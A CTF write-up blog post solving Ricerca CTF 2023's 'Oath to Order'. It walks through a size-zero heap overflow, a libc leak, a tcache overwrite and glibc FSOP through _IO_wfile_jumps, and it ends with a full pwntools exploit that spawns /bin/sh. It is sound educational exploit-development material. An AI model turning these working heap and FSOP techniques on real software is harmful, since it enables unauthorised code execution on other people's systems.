Intro

Hey yo, my name is MC NEET, and the guys who look bad are mostly bad.

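Well, I played a CTF for the first time in a while, so I'm writing a CTF post. I couldn't solve the challenge, so this is me reading other people's writeups and copying them out by hand. Fun. The subject is Oath to Order from Ricerca CTF 2023. Totally unrelated, but I have never managed to spell Ricerca without looking it up. No matter how hard I try, I end up writing Richelca. If anyone knows a good way to remember it, please tell me.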

Challenge Analysis

The challenge is a simple note allocator, where

  • We can allocate up to NOTE_LEN (== 10) notes, each holding up to NOTE_SIZE (== 300) bytes.
  • We can NOT free allocated notes.
  • We can NOT edit allocated notes.
  • We can specify the index of the note to write to. We can write to the same index multiple times, but a new allocation is performed every time.
  • Allocation is done by aligned_alloc(align, size), where we can specify any align smaller than NOTE_SIZE.

The most curious thing is that notes are allocated by aligned_alloc. I will briefly introduce this function later in this post.

Vulnerability

Actually, I couldn't find the vuln in the program at first glance, so I wrote a simple fuzzer and went out. When I came back home, the fuzzer had crashed the program with align == 0x100 and size == 0. Okay, this is the vuln:

.c
void getstr(char *buf, unsigned size) {
  while (--size) {
    if (read(STDIN_FILENO, buf, sizeof(char)) != sizeof(char))
      exit(1);
    else if (*buf == '\n')
      break;
    buf++;
  }

  *buf = '\0';
}

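When size is zero, the pre-decrement --size wraps the unsigned counter around to its maximum value instead of ending the loop, so we can input data of practically arbitrary length and overflow the heap buffer.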
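To make the wraparound concrete, here is a minimal Python model of the loop bound in getstr. It assumes `unsigned` is 32 bits wide (the usual case on x86-64), and the helper name `getstr_limit` is made up for this sketch.

```python
U32_MASK = 0xFFFFFFFF  # assumption: `unsigned` is a 32-bit type


def getstr_limit(size: int) -> int:
    """Maximum number of bytes getstr() stores before the trailing NUL.

    `while (--size)` decrements first and then tests, so the loop body
    runs (size - 1) mod 2**32 times unless a newline ends it earlier.
    """
    return (size - 1) & U32_MASK


for size in (300, 1, 0):
    print(f"size={size:#x} -> up to {getstr_limit(size):#x} bytes")
```

With size == 0 the limit becomes 0xffffffff, while the chunk behind the note is only 0x20 bytes.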

Understanding aligned_alloc to leak libcbase

aligned_alloc is a function that allocates memory at a specified alignment. Below is a simplified flow of an allocation:

  • If align is no larger than MALLOC_ALIGNMENT (== 0x10 in many envs), just call __libc_malloc(). Note that calling __libc_malloc becomes a little bit important later.
  • If align is not a power of 2, round it up to the next power of 2. (I think this violates the POSIX standard, but no worries, this is glibc.)
  • Call _int_memalign(), where _int_malloc() is called with a size of roughly size + align, which covers the worst case of an alignment mismatch.
  • Find the aligned spot in the allocated chunk and split the chunk into three. The first and the third parts are freed, and the second is returned.

This is a pretty simplified explanation, but it’s enough to solve this chall.
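The dispatch described in the list above can be sketched in Python as follows. This is only a model of the simplified flow in this post, not glibc's code: `memalign_plan` and `next_pow2` are names invented here, and the real allocator adds some extra slack to the request that is ignored.

```python
MALLOC_ALIGNMENT = 0x10  # typical value on x86-64 glibc


def next_pow2(n: int) -> int:
    """Smallest power of two that is >= n (for n >= 1)."""
    return 1 << (n - 1).bit_length()


def memalign_plan(align: int, size: int) -> dict:
    """Which allocation path a given (align, size) pair takes in this model."""
    if align <= MALLOC_ALIGNMENT:
        # Small alignment: plain malloc, which also initializes tcache.
        return {"path": "__libc_malloc", "align": MALLOC_ALIGNMENT, "request": size}
    align = next_pow2(align)
    # Worst case: over-allocate by `align` so an aligned spot must exist.
    return {"path": "_int_memalign", "align": align, "request": size + align}


print(memalign_plan(0xF0, 0))
print(memalign_plan(0, 0))
```

In this model align = 0xF0 is rounded up to 0x100 and goes through _int_memalign, while align = 0 falls back to __libc_malloc. Those are exactly the two cases the exploit plays against each other.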

Heap Puzzle: Leak libcbase by freeing an alloced chunk

First, we allocate a chunk with alignment 0xF0 and size 0:

.py
create(0, 0xF0, 0, b"A"*0x10 + p64(0xF0) + p32(0x40))

Note that when we call aligned_alloc with size 0, it allocates a chunk of the minimum size, which is 0x20. Right after the allocation, the heap looks as follows:

.txt
# Chunk A (unsorted, last_remainder)
0x5581b77ee000: 0x0000000000000000      0x00000000000000f1
0x5581b77ee010: 0x00007f1773219ce0      0x00007f1773219ce0
0x5581b77ee020: 0x0000000000000000      0x0000000000000000
0x5581b77ee030: 0x0000000000000000      0x0000000000000000
0x5581b77ee040: 0x0000000000000000      0x0000000000000000
0x5581b77ee050: 0x0000000000000000      0x0000000000000000
0x5581b77ee060: 0x0000000000000000      0x0000000000000000
0x5581b77ee070: 0x0000000000000000      0x0000000000000000
0x5581b77ee080: 0x0000000000000000      0x0000000000000000
0x5581b77ee090: 0x0000000000000000      0x0000000000000000
0x5581b77ee0a0: 0x0000000000000000      0x0000000000000000
0x5581b77ee0b0: 0x0000000000000000      0x0000000000000000
0x5581b77ee0c0: 0x0000000000000000      0x0000000000000000
0x5581b77ee0d0: 0x0000000000000000      0x0000000000000000
0x5581b77ee0e0: 0x0000000000000000      0x0000000000000000
# Chunk B (alloced)
0x5581b77ee0f0: 0x00000000000000f0      0x0000000000000020
0x5581b77ee100: 0x4141414141414141      0x4141414141414141
# Chunk C (fastbin)
0x5581b77ee110: 0x00000000000000f0      0x0000000000000040 # OVERWRITTEN
0x5581b77ee120: 0x00000005581b77ee      0x0000000000000000
0x5581b77ee130: 0x0000000000000000      0x0000000000000000
0x5581b77ee140: 0x0000000000000000      0x0000000000000000
# Top
0x5581b77ee150: 0x0000000000000000      0x0000000000020eb1

We overwrote C’s header with prev_size = 0xF0 and size = 0x40. Obviously, prev_size is invalid for now, but becomes valid later.
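As a sanity check of where the overflow lands, the following sketch redoes the offset arithmetic with the heap-relative offsets read from the dump above (Chunk B at 0xF0, Chunk C at 0x110). It uses `struct` instead of pwntools so that it runs anywhere, and the variable names are only illustrative.

```python
import struct

HDR = 0x10       # prev_size + size fields in front of the user data
CHUNK_B = 0xF0   # offset of Chunk B's header in the dump
CHUNK_C = 0x110  # offset of Chunk C's header in the dump

# Same bytes as b"A"*0x10 + p64(0xF0) + p32(0x40) in the exploit.
payload = b"A" * 0x10 + struct.pack("<Q", 0xF0) + struct.pack("<I", 0x40)

note0 = CHUNK_B + HDR                # note[0] data starts here
prev_size_at = note0 + 0x10          # first field written past Chunk B
size_at = prev_size_at + 8
fake_prev_chunk = CHUNK_C - 0xF0     # chunk that C's new prev_size points back to

print(hex(prev_size_at), hex(size_at), hex(fake_prev_chunk))
```

The forged prev_size points back to offset 0x20, where no chunk header exists yet. That is the spot the next allocation has to create.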

Then, we allocate chunks in Chunk A:

.py
create(1, 0, 0, b"B"*0x18 + p32(0xF1))

Heap looks as follows:

.txt
# Chunk A1 (alloced)
0x560d76401000: 0x0000000000000000      0x0000000000000021
0x560d76401010: 0x4242424242424242      0x4242424242424242
# Chunk A2 (unsorted) (system assumes A2+B is a single chunk with size 0xF0)
0x560d76401020: 0x4242424242424242      0x00000000000000f1 # OVERWRITTEN
0x560d76401030: 0x00007fcf2c019ce0      0x00007fcf2c019ce0
0x560d76401040: 0x0000000000000000      0x0000000000000000
0x560d76401050: 0x0000000000000000      0x0000000000000000
0x560d76401060: 0x0000000000000000      0x0000000000000000
0x560d76401070: 0x0000000000000000      0x0000000000000000
0x560d76401080: 0x0000000000000000      0x0000000000000000
0x560d76401090: 0x0000000000000000      0x0000000000000000
0x560d764010a0: 0x0000000000000000      0x0000000000000000
0x560d764010b0: 0x0000000000000000      0x0000000000000000
0x560d764010c0: 0x0000000000000000      0x0000000000000000
0x560d764010d0: 0x0000000000000000      0x0000000000000000
0x560d764010e0: 0x0000000000000000      0x0000000000000000
# Chunk B (alloced)
0x560d764010f0: 0x00000000000000d0      0x0000000000000020
0x560d76401100: 0x4141414141414141      0x4141414141414141
# Chunk C (fastbin)
0x560d76401110: 0x00000000000000f0      0x0000000000000040
0x560d76401120: 0x0000000560d76401      0x0000000000000000
0x560d76401130: 0x0000000000000000      0x0000000000000000
0x560d76401140: 0x0000000000000000      0x0000000000000000
# [!] tcache
0x560d76401150: 0x0000000000000000      0x0000000000000291
0x560d76401160: 0x0000000000000000      0x0000000000000000

Chunk A1 and A2 are allocated from Chunk A. We overwrote A2’s header with size = 0xF0 and prev_in_use set. Now, prev_size of Chunk C became valid, which means that A2+B becomes a valid prev chunk of C.
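The consistency that the two overwrites establish can be checked with a few lines of arithmetic. This is a sketch over the heap-relative offsets in the dump above; `chunk_size` is a helper written here that masks off the three low flag bits of a size field.

```python
HDR = 0x10
CHUNK_A1 = 0x00
CHUNK_A2 = 0x20
CHUNK_C = 0x110


def chunk_size(size_field: int) -> int:
    """Strip the low three flag bits (PREV_INUSE etc.) from a size field."""
    return size_field & ~0x7


# note[1] lives in A1; 0x18 bytes of "B" reach A2's size field.
overwrite_at = CHUNK_A1 + HDR + 0x18

a2_size_field = 0xF1  # forged: size 0xF0 with PREV_INUSE set
c_prev_size = 0xF0    # forged by the first overflow

next_of_a2 = CHUNK_A2 + chunk_size(a2_size_field)  # where malloc thinks A2 ends
prev_of_c = CHUNK_C - c_prev_size                  # where C thinks its prev starts

print(hex(overwrite_at), hex(next_of_a2), hex(prev_of_c))
```

Both views now agree: the chunk starting at 0x20 ends at 0x110, so the fake A2+B chunk passes for a genuine neighbour of C.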

Finally, we allocate a chunk of size 0xD0, which is allocated from A2+B in unsorted bins:

.py
create(2, 0, 0xC0, b"C" * 0x20)

This is where the magic happens. Heap looks as follows:

.txt
# Chunk A1 (alloced)
0x55942f65c000: 0x0000000000000000      0x0000000000000021
0x55942f65c010: 0x4242424242424242      0x4242424242424242
# Chunk A2A (alloced)
0x55942f65c020: 0x4242424242424242      0x00000000000000d1
0x55942f65c030: 0x4343434343434343      0x4343434343434343
0x55942f65c040: 0x4343434343434343      0x4343434343434343
0x55942f65c050: 0x0000000000000000      0x0000000000000000
0x55942f65c060: 0x0000000000000000      0x0000000000000000
0x55942f65c070: 0x0000000000000000      0x0000000000000000
0x55942f65c080: 0x0000000000000000      0x0000000000000000
0x55942f65c090: 0x0000000000000000      0x0000000000000000
0x55942f65c0a0: 0x0000000000000000      0x0000000000000000
0x55942f65c0b0: 0x0000000000000000      0x0000000000000000
0x55942f65c0c0: 0x0000000000000000      0x0000000000000000
0x55942f65c0d0: 0x0000000000000000      0x0000000000000000
0x55942f65c0e0: 0x0000000000000000      0x0000000000000000
# Chunk A2B(==B) (alloced AND unsorted)
0x55942f65c0f0: 0x00000000000000d0      0x0000000000000021
0x55942f65c100: 0x00007f5eb0e19ce0      0x00007f5eb0e19ce0
# Chunk C (fastbin)
0x55942f65c110: 0x0000000000000020      0x0000000000000040
0x55942f65c120: 0x000000055942f65c      0x0000000000000000
0x55942f65c130: 0x0000000000000000      0x0000000000000000
0x55942f65c140: 0x0000000000000000      0x0000000000000000
# [!] tcache
0x55942f65c150: 0x0000000000000000      0x0000000000000291
0x55942f65c160: 0x0000000000000000      0x0000000000000000

The chunk is carved out of the unsorted bin, and malloc mistakenly trusts the size 0xF0 that we wrote there. Therefore the remainder of the split, which is exactly Chunk B, is treated as free and linked into the unsorted bin, though it is still in use as note[0]. Its fd now holds the address of the unsorted bin, so we can leak it by reading note[0]. We got libcbase.
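The split and the leak can be replayed numerically. In the sketch below, `request2size` is a simplified re-implementation of glibc's size rounding for x86-64, the offsets 0x1b9570 and 0x60770 are the ones used in the full exploit at the end of this post (so they only hold for that particular libc build), and the leaked value is the fd shown in the dump above.

```python
SIZE_SZ = 8
MALLOC_ALIGN_MASK = 0xF
MINSIZE = 0x20


def request2size(req: int) -> int:
    """Chunk size used for a user request of `req` bytes (x86-64 model)."""
    return max(MINSIZE, (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)


CHUNK_A2 = 0x20
FAKE_A2_SIZE = 0xF0

nb = request2size(0xC0)               # chunk size needed for note[2]
remainder_off = CHUNK_A2 + nb         # where the leftover chunk starts
remainder_size = FAKE_A2_SIZE - nb    # how big malloc believes it is

# unsorted-bin address minus libc base, as derived in the full exploit.
UNSORTED_OFFSET = 0x1b9570 + 0x60770
leak = 0x00007f5eb0e19ce0             # fd of Chunk B in the dump
libc_base = leak - UNSORTED_OFFSET

print(hex(nb), hex(remainder_off), hex(remainder_size), hex(libc_base))
```

The remainder starts at offset 0xF0 with size 0x20, which is Chunk B, and the computed base is page-aligned, which is a quick way to see that the offset is plausible.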

Overwriting tcache directly for AAW

You may have noticed that I wrote [!] tcache in the heap layout. In the layout above, tcache sits in the middle of the other chunks. This is because tcache is initialized the first time __libc_malloc is called. Remember that we first called aligned_alloc with align = 0xF0 and then with align = 0x0. When aligned_alloc is called with a large enough align, it goes through _int_memalign and calls _int_malloc directly, which does NOT initialize tcache. This is good news, because we can easily overwrite the tcache in the middle of the heap with the overflow.

.py
#   counts
tcache = p16(1) # count of size=0x20 to 1
tcache = tcache.ljust(0x80, b"\x00") # set other counts to 0
#   entries
tcache += p64(io_stderr)
create(3, 0, 0, b"D"*0x58 + p64(0x291) + tcache)

We set counts of size = 0x20 to 1, and entries of the size to _IO_2_1_stderr_. Yes we have to do FSOP.
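For reference, here is a sketch of the tcache layout that the payload above relies on: 64 two-byte counters followed by 64 entry pointers, as in recent glibc on x86-64. `fake_tcache` and `csize2tidx` are helpers written for this example, and the target address is a made-up placeholder.

```python
import struct

TCACHE_MAX_BINS = 64
MINSIZE = 0x20
MALLOC_ALIGNMENT = 0x10


def csize2tidx(chunk_size: int) -> int:
    """tcache bin index for a chunk size (0x20 -> 0, 0x30 -> 1, ...)."""
    return (chunk_size - MINSIZE) // MALLOC_ALIGNMENT


def fake_tcache(chunk_size: int, target: int) -> bytes:
    """Full tcache image with one entry of `chunk_size` pointing at `target`."""
    counts = [0] * TCACHE_MAX_BINS
    entries = [0] * TCACHE_MAX_BINS
    idx = csize2tidx(chunk_size)
    counts[idx] = 1
    entries[idx] = target
    return struct.pack("<64H", *counts) + struct.pack("<64Q", *entries)


target = 0x7FFFF7E1A6A0  # hypothetical address standing in for _IO_2_1_stderr_
blob = fake_tcache(0x20, target)

# The exploit only sends the prefix that matters: counts plus entries[0].
short = struct.pack("<H", 1).ljust(0x80, b"\x00") + struct.pack("<Q", target)
print(hex(len(blob)), blob.startswith(short))
```

The full image is 0x280 bytes, which together with the 0x10-byte header gives the 0x290 chunk seen in the dump. The next malloc of a 0x20 chunk then returns the target address.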

(Figure: Heap Corruption)

FSOP: abusing wfile vtable

TBH, I'm a total stranger to FSOP on recent glibc, so I searched for some writeups and found good articles.

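Plainly speaking, the functions in the vtable _IO_wfile_jumps call through _wide_data->_wide_vtable, and those calls are not supervised the way calls through the normal vtable are. So my approach is: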

  • Target is _IO_2_1_stderr_ (hereinafter called stderr).
  • Overwrite stderr._wide_data._wide_vtable to point to somewhere we can write to.
  • Overwrite stderr._vtable from _IO_file_jumps to _IO_wfile_jumps.
  • Get stderr._vtable.__overflow == _IO_wfile_overflow called, which leads to a call to stderr._wide_data._wide_vtable.__doallocate.
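The slots mentioned in the list above sit at fixed offsets inside a jump table. The sketch below lists the members of glibc's `struct _IO_jump_t` in declaration order, assuming 8-byte entries on x86-64, and derives the two offsets that matter here. `slot_offset` is a helper name invented for this example.

```python
# Members of struct _IO_jump_t in declaration order (8 bytes each on x86-64).
IO_JUMP_T_MEMBERS = [
    "__dummy", "__dummy2", "__finish", "__overflow", "__underflow",
    "__uflow", "__pbackfail", "__xsputn", "__xsgetn", "__seekoff",
    "__seekpos", "__setbuf", "__sync", "__doallocate", "__read",
    "__write", "__seek", "__close", "__stat", "__showmanyc", "__imbue",
]


def slot_offset(name: str) -> int:
    """Byte offset of a function pointer inside the jump table."""
    return IO_JUMP_T_MEMBERS.index(name) * 8


print(hex(slot_offset("__overflow")), hex(slot_offset("__doallocate")))
```

So a fake wide vtable only needs a controlled pointer at offset 0x68 for __doallocate; the rest of the table can be garbage for this attack.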

__overflow is called when glibc is exiting. glibc calls _IO_cleanup(), where _IO_flush_all_lockp() is called:

.c
int
_IO_flush_all_lockp (int do_lock)
{
  int result = 0;
  FILE *fp;
...
  for (fp = (FILE *) _IO_list_all; fp != NULL; fp = fp->_chain)
    {
      ...
      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
        || (_IO_vtable_offset (fp) == 0
          && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
              > fp->_wide_data->_IO_write_base))
        )
      && _IO_OVERFLOW (fp, EOF) == EOF)
        result = EOF;

    ...
    }
...
}

From this code we can read off some restrictions that stderr must satisfy to reach _IO_OVERFLOW:

  • _mode must be larger than 0
  • _wide_data->_IO_write_ptr must be greater than _wide_data->_IO_write_base

Then, _IO_wfile_overflow is called:

.c
wint_t
_IO_wfile_overflow (FILE *f, wint_t wch)
{
  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
      ...
      return WEOF;
    }
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0)
    {
      /* Allocate a buffer if needed. */
      if (f->_wide_data->_IO_write_base == 0)
        {
          _IO_wdoallocbuf (f);
          ...
        }
      else
...

Additional restrictions on stderr:

  • _flags & _IO_NO_WRITES(0x8) must be 0
  • _flags & _IO_CURRENTLY_PUTTING(0x800) must be 0
  • _wide_data->_IO_write_base must be NULL

Finally, _IO_wdoallocbuf is called:

.c
void
_IO_wdoallocbuf (FILE *fp)
{
  if (fp->_wide_data->_IO_buf_base)
    return;
  if (!(fp->_flags & _IO_UNBUFFERED))
    if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF)
      return;
...
}

Final restriction:

  • _flags & _IO_UNBUFFERED(0x2) must be 0
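All restrictions collected so far can be folded into one predicate. The following is a minimal sketch: `FakeFile` is a toy stand-in for the relevant FILE fields (not glibc's struct), and the `_IO_vtable_offset (fp) == 0` check is left out on the assumption that it always holds on current builds.

```python
from dataclasses import dataclass

_IO_UNBUFFERED = 0x2
_IO_NO_WRITES = 0x8
_IO_CURRENTLY_PUTTING = 0x800


@dataclass
class FakeFile:
    """Only the fields that the three glibc functions above look at."""
    flags: int
    mode: int
    wide_write_base: int
    wide_write_ptr: int
    wide_buf_base: int


def reaches_doallocate(f: FakeFile) -> bool:
    """True if exit-time flushing would end up in _wide_vtable->__doallocate."""
    # _IO_flush_all_lockp: wide branch of the condition
    flush_ok = f.mode > 0 and f.wide_write_ptr > f.wide_write_base
    # _IO_wfile_overflow
    overflow_ok = (
        (f.flags & _IO_NO_WRITES) == 0
        and (f.flags & _IO_CURRENTLY_PUTTING) == 0
        and f.wide_write_base == 0
    )
    # _IO_wdoallocbuf
    alloc_ok = f.wide_buf_base == 0 and (f.flags & _IO_UNBUFFERED) == 0
    return flush_ok and overflow_ok and alloc_ok


good = FakeFile(flags=0x20202020, mode=1, wide_write_base=0,
                wide_write_ptr=0x10, wide_buf_base=0)
bad = FakeFile(flags=_IO_NO_WRITES, mode=1, wide_write_base=0,
               wide_write_ptr=0x10, wide_buf_base=0)
print(reaches_doallocate(good), reaches_doallocate(bad))
```

The values in `good` mirror what the payload in this post ends up writing into stderr and its fake _wide_data.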

To fulfill all the conditions, we can overwrite stderr and following stdout as below:

.py
# Overwrite _IO_2_1_stderr_
#  flags
#  - & _IO_NO_WRITES(0x8): must be 0
#  - & _IO_CURRENTLY_PUTTING(0x800): must be 0
#  - & _IO_UNBUFFERED(0x2): must be 0
#  To fulfill this condition, we just use spaces(0x20) before /bin/sh
payload = b" " * 8 + b"/bin/sh\x00" # flags
payload += p64(0x0) * (0x90 // 8 - 1)
payload += p64(0) # cvt
payload += p64(io_stdout + 0x20) # wide_data
payload += p64(0) * 3
payload += p32(1) # mode: must be larger than 0
payload += b"\x00"*0x14
payload += p64(io_wfile_jumps) # vtable

## stdout (== stderr->_wide_data)
payload += p64(0) * 4 # becomes wide_vtable
payload += p64(0) * 3 # read
payload += p64(0) # write_base: must be NULL
payload += p64(0x10) # write_ptr
payload += p64(0x0) # write_end
payload += p64(0x0) # buf_base
payload += p64(system) * 4 # becomes wide_vtable->doalloc
payload += p64(0) * 2 # state
payload += p64(0) * (0x70 // 8) # codecvt
payload += p64(io_stdout) * 10 # wide_vtable

create(4, 0, 0, payload)
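To double-check that every value of the payload lands on the intended field, the sketch below rebuilds it with `struct` and reads the fields back. The field offsets (_wide_data at 0xA0, _mode at 0xC0, vtable at 0xD8, _wide_vtable at 0xE0 inside the wide data) are the x86-64 glibc layout as I understand it, and all addresses are hypothetical placeholders.

```python
import struct


def p64(v: int) -> bytes:
    return struct.pack("<Q", v)


def p32(v: int) -> bytes:
    return struct.pack("<I", v)


def u64_at(buf: bytes, off: int) -> int:
    return struct.unpack_from("<Q", buf, off)[0]


def u32_at(buf: bytes, off: int) -> int:
    return struct.unpack_from("<I", buf, off)[0]


# Hypothetical addresses, used only to check offsets.
io_stderr = 0x7FFFF7E1A6A0
io_stdout = io_stderr + 0xE0
io_wfile_jumps = 0x7FFFF7E160C0
system = 0x7FFFF7C50D60

stderr_part = b" " * 8 + b"/bin/sh\x00"
stderr_part += p64(0) * (0x90 // 8 - 1)
stderr_part += p64(0)                 # cvt
stderr_part += p64(io_stdout + 0x20)  # wide_data
stderr_part += p64(0) * 3
stderr_part += p32(1)                 # mode
stderr_part += b"\x00" * 0x14
stderr_part += p64(io_wfile_jumps)    # vtable

stdout_part = p64(0) * 4
stdout_part += p64(0) * 3             # read pointers
stdout_part += p64(0)                 # write_base
stdout_part += p64(0x10)              # write_ptr
stdout_part += p64(0)                 # write_end
stdout_part += p64(0)                 # buf_base
stdout_part += p64(system) * 4
stdout_part += p64(0) * 2             # state
stdout_part += p64(0) * (0x70 // 8)   # codecvt
stdout_part += p64(io_stdout) * 10    # wide_vtable

WIDE = 0x20  # the fake _wide_data starts 0x20 bytes into stdout
print(hex(len(stderr_part)), hex(u64_at(stdout_part, 0x68)))
```

The stderr part is exactly 0xE0 bytes long, so the second part starts right at stdout, and the slot at offset 0x68 of the fake vtable (which is stdout itself) holds system.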

We use stdout as a buffer for _wide_data (and for the entries of the fake vtable). In this challenge, IO is performed with read/write calls, so these FILE structures can be tampered with freely. As a side note, stderr is the first entry in the chain of FILE structures, so we don't have to pay attention to stdout and stdin at all :). When wide_vtable.__doallocate, which is overwritten with system(), is called, RDI is fp, which is stderr in this case. So we want to place the string /bin/sh\x00 at the start of stderr. However, _flags lives there and has the restrictions stated above, and the string alone doesn't satisfy them. No worries. We can just prefix /bin/sh\x00 with 8 spaces (0x20), and then all conditions are fulfilled. Space is a great character for FSOP!

Full Exploit

https://github.com/smallkirby/pwn-writeups/blob/master/ricerca2023/oath-to-order/exploit.py

.py
#!/usr/bin/env python
#encoding: utf-8;

from pwn import *
import sys

FILENAME = "chall"
LIBCNAME = ""

hosts = ("oath-to-order.2023.ricercactf.com","localhost","localhost")
ports = (9003,12300,23947)
rhp1 = {'host':hosts[0],'port':ports[0]}    #for actual server
rhp2 = {'host':hosts[1],'port':ports[1]}    #for localhost
rhp3 = {'host':hosts[2],'port':ports[2]}    #for localhost running on docker
context(os='linux',arch='amd64')
binf = ELF(FILENAME)
libc = ELF(LIBCNAME) if LIBCNAME!="" else None


## utilities #########################################

def create(ix: int, align: int, size: int, data: bytes):
  global c
  print(f"[CREATE] ix:{ix}, align:{align}, size:{size}, datalen:{len(data)}")
  print(c.recvuntil("1. Create"))
  c.sendlineafter("> ", b"1")
  c.sendlineafter("index: ",str(ix))
  if "inv" in str(c.recv(4)):
    return
  c.sendlineafter(": ", str(size))
  if "inv" in str(c.recv(4)):
    return
  c.sendlineafter(": ", str(align))
  if "inv" in str(c.recv(4)):
    return
  if '\n' in str(data):
    c.sendlineafter(": ", str(data).split('\n')[0])
  elif (len(data) == size - 1) and (size != 0) and (len(data) != 0):
    c.sendafter(": ", data)
  elif (len(data) >= size and size != 0):
    c.sendafter(": ", data[:size-1])
  else:
    c.sendlineafter(": ", data)

def show(ix: int):
  global c
  print(f"[SHOW] ix:{ix}")
  print(c.recvuntil("1. Create"))
  c.sendlineafter("> ", b"2")
  c.sendlineafter("index: ", str(ix))

def quit():
  global c
  c.sendlineafter("> ", "3")

  c.interactive()

def wait():
  input("WAITING INPUT...")

## exploit ###########################################

def exploit():
  global c

  # Alloc 3 chunks
  #  - A: freed(unsorted), size=0xF0, align=0x0
  #  - B: alloced        , size=0x20, align=0xF0
  #  - C: freed(fast)    , size=0x40, align=0x110
  # Then overwrite C's header with prev_size=0xF0, prev_in_use=false
  # Chunk referred to by prev_size is allocated later.
  create(0, 0xF0, 0, b"A"*0x10 + p64(0xF0) + p32(0x40))
  # Alloc 2 chunks, using the freed chunk A
  #  - A1: alloced,         size=0x20, align=0x0
  #  - A2: freed(unsorted), size=0xD0, align=0x20
  # Then overwrite A2's header with 0xF1, which is same with C's prev_size.
  # A2 becomes valid prev chunk of C.
  #
  # Note that this is the first time to call __libc_malloc,
  # where tcache is initialized in chunk of size 0x290, because
  #  - memalign with too small align: calls `__libc_malloc`
  #  - normal memalign: calls `_int_memalign`, where `_int_malloc` is directly called
  # Therefore, tcache is initialized right after chunk C.
  create(1, 0, 0, b"B"*0x18 + p32(0xF1))
  # Alloc 2 chunks, using unsortedbin (A2)
  # A2 is the only chunk in unsortedbin and is a last_remainder,
  # so it is split into 2 chunks.
  #  - A2A: alloced, size=0xD0, align=0x20
  #  - A2B: freed(unsorted), size=0x20, align=0xF0
  # A2B is identical to B. Its fd and bk is overwritten with unsortedbin's addr.
  create(2, 0, 0xC0, b"C" * 0x20)

  # Leak unsortedbin addr via fd of B(==A2B)
  show(0)
  unsorted = u64(c.recv(6).ljust(8, b"\x00"))
  print("[+] unsorted bin: " + hex(unsorted))
  printf = unsorted - 0x1b9570
  libcbase = printf - 0x60770
  print("[+] libc base: " + hex(libcbase))
  system = libcbase + 0x50d60
  io_stderr = libcbase + 0x21a6a0
  io_stdout = io_stderr + 0xE0
  io_wfile_jumps = libcbase + 0x2160c0
  main_arena = libcbase + 0x219c80
  setcontext = libcbase + 0x53a30
  print("[+] system: " + hex(system))
  print("[+] _IO_2_1_stderr_: " + hex(io_stderr))
  print("[+] main_arena: " + hex(main_arena))
  print("[+] setcontext: " + hex(setcontext))

  # Overwrite tcache in heap right after C.
  #   counts
  tcache = p16(1) # count of size=0x20 to 1
  tcache = tcache.ljust(0x80, b"\x00") # set other counts to 0
  #   entries
  tcache += p64(io_stderr)
  create(3, 0, 0, b"D"*0x58 + p64(0x291) + tcache)

  # Overwrite _IO_2_1_stderr_
  #  flags
  #  - & _IO_NO_WRITES(0x8): must be 0
  #  - & _IO_CURRENTLY_PUTTING(0x800): must be 0
  #  - & _IO_UNBUFFERED(0x2): must be 0
  #  To fulfill this condition, we just use spaces(0x20) before /bin/sh
  payload = b" " * 8 + b"/bin/sh\x00" # flags
  payload += p64(0x0) * (0x90 // 8 - 1)
  payload += p64(0) # cvt
  payload += p64(io_stdout + 0x20) # wide_data
  payload += p64(0) * 3
  payload += p32(1) # mode: must be larger than 0
  payload += b"\x00"*0x14
  payload += p64(io_wfile_jumps) # vtable

  ## stdout (== stderr->_wide_data)
  payload += p64(0) * 4 # becomes wide_vtable
  payload += p64(0) * 3 # read
  payload += p64(0) # write_base: must be NULL
  payload += p64(0x10) # write_ptr
  payload += p64(0x0) # write_end
  payload += p64(0x0) # buf_base
  payload += p64(system) * 4 # becomes wide_vtable->doalloc
  payload += p64(0) * 2 # state
  payload += p64(0) * (0x70 // 8) # codecvt
  payload += p64(io_stdout) * 10 # wide_vtable

  create(4, 0, 0, payload)
  quit() # invoke _IO_wfile_overflow in _IO_flush_all_lockp

  c.interactive()

## main ##############################################

if __name__ == "__main__":
    if len(sys.argv)>1:
      if sys.argv[1][0]=="d":
        cmd = """
          set follow-fork-mode parent
        """
        c = gdb.debug(FILENAME,cmd)
      elif sys.argv[1][0]=="r":
        c = remote(rhp1["host"],rhp1["port"])
        #s = ssh('<USER>', '<HOST>', password='<PASSWORD>')
        #c = s.process(executable='<BIN>')
      elif sys.argv[1][0]=="v":
        c = remote(rhp3["host"],rhp3["port"])
    else:
        c = remote(rhp2['host'],rhp2['port'])
    exploit()
    c.interactive()

Outro

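Man, this one was such a puzzle, I loved it. I wonder if the challenge used read/write instead of scanf/printf so that it would be fine to wreck stdout. I knew almost nothing about recent glibc FSOP, so I learned a lot. It was fun enough that I'm thinking of using this as a chance to get back into CTFs.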

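Also, as an aside, the week after next I have to get on an airplane for the first time in my life and go to Italy, so I'm thinking I should write my will before then.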

Refs